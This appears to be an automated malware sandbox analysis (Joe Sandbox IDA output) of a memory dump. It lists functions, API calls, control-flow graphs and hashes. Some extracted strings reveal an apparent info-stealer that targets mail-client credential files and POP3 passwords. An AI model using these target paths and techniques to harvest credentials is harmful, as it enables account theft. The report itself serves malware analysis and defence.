                                                              • Part of subcall function 20A01CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 20A01D1B
                                                              • Part of subcall function 20A01CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 20A01D37
                                                              • Part of subcall function 20A01CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20A01D4B
                                                            • _strlen.LIBCMT ref: 20A01855
                                                            • _strlen.LIBCMT ref: 20A01869
                                                            • _strlen.LIBCMT ref: 20A0188B
                                                            • _strlen.LIBCMT ref: 20A018AE
                                                            • _strlen.LIBCMT ref: 20A018C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: _strlen$File$CopyCreateDelete
                                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                            • API String ID: 3296212668-3023110444
                                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                            • Instruction ID: c9d8478206988f11ca54e793a664ffdf5fbe781c9c2c31a7ad32ba8b044ddfc8
                                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                            • Instruction Fuzzy Hash: A261F571E0021CABEF11CBE4E991BEEB7BBBF55340F904096E204A7250EB745A45CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: %m$~$Gon~$~F@7$~dra
                                                            • API String ID: 4218353326-230879103
                                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                            • Instruction ID: 5cc765804afec451f313da05f96dbf5e6bbdb91cf42d4cb8fdb0d755f5714a5a
                                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                            • Instruction Fuzzy Hash: F97115B1E0022C5BDF119BF4A985BEF7BFEAB15340F904096E644D7241E6749B85CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 287 20a07cc2-20a07cd6 288 20a07d44-20a07d4c 287->288 289 20a07cd8-20a07cdd 287->289 290 20a07d93-20a07dab call 20a07e35 288->290 291 20a07d4e-20a07d51 288->291 289->288 292 20a07cdf-20a07ce4 289->292 300 20a07dae-20a07db5 290->300 291->290 293 20a07d53-20a07d90 call 20a0571e * 4 291->293 292->288 295 20a07ce6-20a07ce9 292->295 293->290 295->288 298 20a07ceb-20a07cf3 295->298 301 20a07cf5-20a07cf8 298->301 302 20a07d0d-20a07d15 298->302 306 20a07dd4-20a07dd8 300->306 307 20a07db7-20a07dbb 300->307 301->302 308 20a07cfa-20a07d0c call 20a0571e call 20a090ba 301->308 304 20a07d17-20a07d1a 302->304 305 20a07d2f-20a07d43 call 20a0571e * 2 302->305 304->305 310 20a07d1c-20a07d2e call 20a0571e call 20a091b8 304->310 305->288 311 20a07df0-20a07dfc 306->311 312 20a07dda-20a07ddf 306->312 314 20a07dd1 307->314 315 20a07dbd-20a07dc0 307->315 308->302 310->305 311->300 324 20a07dfe-20a07e0b call 20a0571e 311->324 321 20a07de1-20a07de4 312->321 322 20a07ded 312->322 314->306 315->314 317 20a07dc2-20a07dd0 call 20a0571e * 2 315->317 317->314 321->322 329 20a07de6-20a07dec call 20a0571e 321->329 322->311 329->322
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 20A07D06
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A090D7
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A090E9
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A090FB
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A0910D
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A0911F
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A09131
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A09143
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A09155
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A09167
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A09179
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A0918B
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A0919D
                                                              • Part of subcall function 20A090BA: _free.LIBCMT ref: 20A091AF
                                                            • _free.LIBCMT ref: 20A07CFB
                                                              • Part of subcall function 20A0571E: HeapFree.KERNEL32(00000000,00000000,?,20A0924F,?,00000000,?,00000000,?,20A09276,?,00000007,?,?,20A07E5A,?), ref: 20A05734
                                                              • Part of subcall function 20A0571E: GetLastError.KERNEL32(?,?,20A0924F,?,00000000,?,00000000,?,20A09276,?,00000007,?,?,20A07E5A,?,?), ref: 20A05746
                                                            • _free.LIBCMT ref: 20A07D1D
                                                            • _free.LIBCMT ref: 20A07D32
                                                            • _free.LIBCMT ref: 20A07D3D
                                                            • _free.LIBCMT ref: 20A07D5F
                                                            • _free.LIBCMT ref: 20A07D72
                                                            • _free.LIBCMT ref: 20A07D80
                                                            • _free.LIBCMT ref: 20A07D8B
                                                            • _free.LIBCMT ref: 20A07DC3
                                                            • _free.LIBCMT ref: 20A07DCA
                                                            • _free.LIBCMT ref: 20A07DE7
                                                            • _free.LIBCMT ref: 20A07DFF
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: 9810a956a370608e46bf254880ceadbfda99af8760343a5ecd0fa9a1b0aad995
                                                            • Instruction ID: ff61a9921da292f2a164b8b5fbc6bed4b7b859757023d86deae3c932c844a17e
                                                            • Opcode Fuzzy Hash: 9810a956a370608e46bf254880ceadbfda99af8760343a5ecd0fa9a1b0aad995
                                                            • Instruction Fuzzy Hash: 69314C31E0024CDFDB219AB8EA81B6BB7EBBF10210F904859E848D7151EE35AD80DB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • _free.LIBCMT ref: 20A059EA
                                                              • Part of subcall function 20A0571E: HeapFree.KERNEL32(00000000,00000000,?,20A0924F,?,00000000,?,00000000,?,20A09276,?,00000007,?,?,20A07E5A,?), ref: 20A05734
                                                              • Part of subcall function 20A0571E: GetLastError.KERNEL32(?,?,20A0924F,?,00000000,?,00000000,?,20A09276,?,00000007,?,?,20A07E5A,?,?), ref: 20A05746
                                                            • _free.LIBCMT ref: 20A059F6
                                                            • _free.LIBCMT ref: 20A05A01
                                                            • _free.LIBCMT ref: 20A05A0C
                                                            • _free.LIBCMT ref: 20A05A17
                                                            • _free.LIBCMT ref: 20A05A22
                                                            • _free.LIBCMT ref: 20A05A2D
                                                            • _free.LIBCMT ref: 20A05A38
                                                            • _free.LIBCMT ref: 20A05A43
                                                            • _free.LIBCMT ref: 20A05A51
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 8ff23d28cc714a40eab2e254223249f77f1bcf066d044e1a8b05cc2862ea5fc6
                                                            • Instruction ID: e298afc481471d4f623365339ac9c6a978125b661651d7f224648b57f02eb24e
                                                            • Opcode Fuzzy Hash: 8ff23d28cc714a40eab2e254223249f77f1bcf066d044e1a8b05cc2862ea5fc6
                                                            • Instruction Fuzzy Hash: 3F11AA7A61014CEFCB11DFA8E942EDE3F6AEF14250B854491BD084B121EA31DE50AB44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 20A01D1B
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 20A01D37
                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20A01D4B
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20A01D58
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20A01D72
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20A01D7D
                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20A01D8A
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                            • String ID:
                                                            • API String ID: 1454806937-0
                                                            • Opcode ID: f59fc8b365928b29f5a9b640a609cd418593d146114adc219ac0cbf502a2179f
                                                            • Instruction ID: 1ca0e95656ea6b2053ce64eefb67d3816c4dbb3afadf5800658b42aeb49aa68f
                                                            • Opcode Fuzzy Hash: f59fc8b365928b29f5a9b640a609cd418593d146114adc219ac0cbf502a2179f
                                                            • Instruction Fuzzy Hash: 5F210AB294121CAFE710DBE09CCCFEA76ADFB18254F800965F516D2140E6759E469A60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 388 20a09492-20a094ef GetConsoleCP 389 20a09632-20a09644 call 20a02ada 388->389 390 20a094f5-20a09511 388->390 392 20a09513-20a0952a 390->392 393 20a0952c-20a0953d call 20a07c19 390->393 395 20a09566-20a09575 call 20a079e6 392->395 400 20a09563-20a09565 393->400 401 20a0953f-20a09542 393->401 395->389 402 20a0957b-20a0959b WideCharToMultiByte 395->402 400->395 403 20a09548-20a0955a call 20a079e6 401->403 404 20a09609-20a09628 401->404 402->389 405 20a095a1-20a095b7 WriteFile 402->405 403->389 410 20a09560-20a09561 403->410 404->389 407 20a095b9-20a095ca 405->407 408 20a0962a-20a09630 GetLastError 405->408 407->389 411 20a095cc-20a095d0 407->411 408->389 410->402 412 20a095d2-20a095f0 WriteFile 411->412 413 20a095fe-20a09601 411->413 412->408 414 20a095f2-20a095f6 412->414 413->390 415 20a09607 413->415 414->389 416 20a095f8-20a095fb 414->416 415->389 416->413
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,20A09C07,?,00000000,?,00000000,00000000), ref: 20A094D4
                                                            • __fassign.LIBCMT ref: 20A0954F
                                                            • __fassign.LIBCMT ref: 20A0956A
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 20A09590
                                                            • WriteFile.KERNEL32(?,?,00000000,20A09C07,00000000,?,?,?,?,?,?,?,?,?,20A09C07,?), ref: 20A095AF
                                                            • WriteFile.KERNEL32(?,?,00000001,20A09C07,00000000,?,?,?,?,?,?,?,?,?,20A09C07,?), ref: 20A095E8
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 543d494630c5cfb36c324a4db80f71a1ed7e9750005a25b7116182015f7f636b
                                                            • Instruction ID: c55384185abac1fe8cef7f59c4bafa1d67226a1ea27127e39102f1bd78abcf47
                                                            • Opcode Fuzzy Hash: 543d494630c5cfb36c324a4db80f71a1ed7e9750005a25b7116182015f7f636b
                                                            • Instruction Fuzzy Hash: 7651A071E00249AFDB00CFE4D8A5BEEBBFAFF19300F50811AE555E7291D631A942CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 417 20a03370-20a033b5 call 20a03330 call 20a037a7 422 20a03416-20a03419 417->422 423 20a033b7-20a033c9 417->423 424 20a03439-20a03442 422->424 425 20a0341b-20a03428 call 20a03790 422->425 423->424 426 20a033cb 423->426 429 20a0342d-20a03436 call 20a03330 425->429 428 20a033d0-20a033e7 426->428 430 20a033e9-20a033f7 call 20a03740 428->430 431 20a033fd 428->431 429->424 438 20a033f9 430->438 439 20a0340d-20a03414 430->439 432 20a03400-20a03405 431->432 432->428 436 20a03407-20a03409 432->436 436->424 440 20a0340b 436->440 441 20a03443-20a0344c 438->441 442 20a033fb 438->442 439->429 440->429 443 20a03486-20a03496 call 20a03774 441->443 444 20a0344e-20a03455 441->444 442->432 450 20a03498-20a034a7 call 20a03790 443->450 451 20a034aa-20a034c6 call 20a03330 call 20a03758 443->451 444->443 445 20a03457-20a03466 call 20a0bbe0 444->445 453 20a03483 445->453 454 20a03468-20a03480 445->454 450->451 453->443 454->453
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 20A0339B
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 20A033A3
                                                            • _ValidateLocalCookies.LIBCMT ref: 20A03431
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 20A0345C
                                                            • _ValidateLocalCookies.LIBCMT ref: 20A034B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: 74c14dee49095dbd9c986f12f3f542b9e07cb0b53be55bca13383d72531a49a4
                                                            • Instruction ID: 527fac428b1ea9d8e81a292dbcdfd8d9a945753798cf6de681900fc4bc502b38
                                                            • Opcode Fuzzy Hash: 74c14dee49095dbd9c986f12f3f542b9e07cb0b53be55bca13383d72531a49a4
                                                            • Instruction Fuzzy Hash: 7541D576E0820C9BCB01CFE8E8C0B9EBBBABF45224F908155E9159F251D776DA01CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 20A09221: _free.LIBCMT ref: 20A0924A
                                                            • _free.LIBCMT ref: 20A092AB
                                                              • Part of subcall function 20A0571E: HeapFree.KERNEL32(00000000,00000000,?,20A0924F,?,00000000,?,00000000,?,20A09276,?,00000007,?,?,20A07E5A,?), ref: 20A05734
                                                              • Part of subcall function 20A0571E: GetLastError.KERNEL32(?,?,20A0924F,?,00000000,?,00000000,?,20A09276,?,00000007,?,?,20A07E5A,?,?), ref: 20A05746
                                                            • _free.LIBCMT ref: 20A092B6
                                                            • _free.LIBCMT ref: 20A092C1
                                                            • _free.LIBCMT ref: 20A09315
                                                            • _free.LIBCMT ref: 20A09320
                                                            • _free.LIBCMT ref: 20A0932B
                                                            • _free.LIBCMT ref: 20A09336
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                            • Instruction ID: 0e96e7c2639be1329dd5d942077a4ab747df10cf0355355ea559110eae2aed93
                                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                            • Instruction Fuzzy Hash: E7117F31A44B0CFAD620ABF0EE47FCB7B9EAF28700FC00C24BA9976052EA24B5145651
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,20A06FFD,00000000,?,?,?,20A08A72,?,?,00000100), ref: 20A0887B
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,20A08A72,?,?,00000100,5EFC4D8B,?,?), ref: 20A08901
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 20A089FB
                                                            • __freea.LIBCMT ref: 20A08A08
                                                              • Part of subcall function 20A056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 20A05702
                                                            • __freea.LIBCMT ref: 20A08A11
                                                            • __freea.LIBCMT ref: 20A08A36
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: b023e9618b5a16f11888ab5286e3b6fd97da713fb4c2b3ce5e4bed0b6e90aeec
                                                            • Instruction ID: be38cc34da449f6a2b5cf62023c2e98a84dd22a9de1bdbb51b2b0dc35773f3e7
                                                            • Opcode Fuzzy Hash: b023e9618b5a16f11888ab5286e3b6fd97da713fb4c2b3ce5e4bed0b6e90aeec
                                                            • Instruction Fuzzy Hash: 4251E172B1020EAFDB148FA0EC41FAB37ABFB40790F914629F944D6940EB35DC549AA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _strlen.LIBCMT ref: 20A01607
                                                            • _strcat.LIBCMT ref: 20A0161D
                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,20A0190E,?,?,00000000,?,00000000), ref: 20A01643
                                                            • lstrcatW.KERNEL32(?,?), ref: 20A0165A
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,20A0190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 20A01661
                                                            • lstrcatW.KERNEL32(00001008,?), ref: 20A01686
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                            • String ID:
                                                            • API String ID: 1922816806-0
                                                            • Opcode ID: 4e8ca7b3b6d57e64d480584563000fea88c949df2c444bb3c01362add0d216ba
                                                            • Instruction ID: 2c4240bd7210b165d25804efa21ee79962402d7811d7810ef9ecdc8abf600749
                                                            • Opcode Fuzzy Hash: 4e8ca7b3b6d57e64d480584563000fea88c949df2c444bb3c01362add0d216ba
                                                            • Instruction Fuzzy Hash: 7F21DA36A00208ABD704DFD4ED85FEE77B9FF88710F54441AF605AB181EB35A94287A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrcatW.KERNEL32(?,?), ref: 20A01038
                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 20A0104B
                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 20A01061
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 20A01075
                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 20A01090
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 20A010B8
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                            • String ID:
                                                            • API String ID: 3594823470-0
                                                            • Opcode ID: fa7edd8a70aaeed550ed82b4501828fc539b7d84fd00a47a16be8986df16be70
                                                            • Instruction ID: 8801e915aead69c6c5285396c86b849526f08d03de6453b233d84e8dd2f83273
                                                            • Opcode Fuzzy Hash: fa7edd8a70aaeed550ed82b4501828fc539b7d84fd00a47a16be8986df16be70
                                                            • Instruction Fuzzy Hash: AA217F3690031C9BCF10DFE0ED58FDF376AEF44214F904296E999971A1DA359A86CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,20A03518,20A023F1,20A01F17), ref: 20A03864
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 20A03872
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 20A0388B
                                                            • SetLastError.KERNEL32(00000000,?,20A03518,20A023F1,20A01F17), ref: 20A038DD
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 4ba3512868f9534c748466e150e5700a316bd2038791f6bbef960a36a9a49f30
                                                            • Instruction ID: d4ee618910347078f5caf157e56cccdd5929bc399f178eda38f345fe7c470033
                                                            • Opcode Fuzzy Hash: 4ba3512868f9534c748466e150e5700a316bd2038791f6bbef960a36a9a49f30
                                                            • Instruction Fuzzy Hash: 1D01283370CF1D5EA6049BFA7CD5B0627DFEB1A675BA0C26AF110540E1EF154C06A300
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,20A06C6C), ref: 20A05AFA
                                                            • _free.LIBCMT ref: 20A05B2D
                                                            • _free.LIBCMT ref: 20A05B55
                                                            • SetLastError.KERNEL32(00000000,?,?,20A06C6C), ref: 20A05B62
                                                            • SetLastError.KERNEL32(00000000,?,?,20A06C6C), ref: 20A05B6E
                                                            • _abort.LIBCMT ref: 20A05B74
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: cccd04084936bcbe0bbc0b086b25de621d9c60687daf46d8fd39e7f9d3d72234
                                                            • Instruction ID: f3c92682b24af9b02ff0c681e8345d300967af3fdf53e44da53dd31a179a1fef
                                                            • Opcode Fuzzy Hash: cccd04084936bcbe0bbc0b086b25de621d9c60687daf46d8fd39e7f9d3d72234
                                                            • Instruction Fuzzy Hash: 57F0C833B0890CBBD20267F8BD8AF0F366BAFD6571FE50124F919A6190FE299D035164
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 20A01E89: lstrlenW.KERNEL32(?,?,?,?,?,20A010DF,?,?,?,00000000), ref: 20A01E9A
                                                              • Part of subcall function 20A01E89: lstrcatW.KERNEL32(?,?), ref: 20A01EAC
                                                              • Part of subcall function 20A01E89: lstrlenW.KERNEL32(?,?,20A010DF,?,?,?,00000000), ref: 20A01EB3
                                                              • Part of subcall function 20A01E89: lstrlenW.KERNEL32(?,?,20A010DF,?,?,?,00000000), ref: 20A01EC8
                                                              • Part of subcall function 20A01E89: lstrcatW.KERNEL32(?,20A010DF), ref: 20A01ED3
                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 20A0122A
                                                              • Part of subcall function 20A0173A: _strlen.LIBCMT ref: 20A01855
                                                              • Part of subcall function 20A0173A: _strlen.LIBCMT ref: 20A01869
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                            • API String ID: 4036392271-1520055953
                                                            • Opcode ID: dd8adf7f1be67f0bd7876a1279b0eb1f2991054da710cce61cb7ae3e42b4216e
                                                            • Instruction ID: a0dc8f1d7eab491bef2dda944cfe19663e1390b4ed7bbecdd9eb433550126beb
                                                            • Opcode Fuzzy Hash: dd8adf7f1be67f0bd7876a1279b0eb1f2991054da710cce61cb7ae3e42b4216e
                                                            • Instruction Fuzzy Hash: 33219379A142086AEB1097E0EC92FFD733AFF90718F800556F604EB1D0E6B15E818759
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
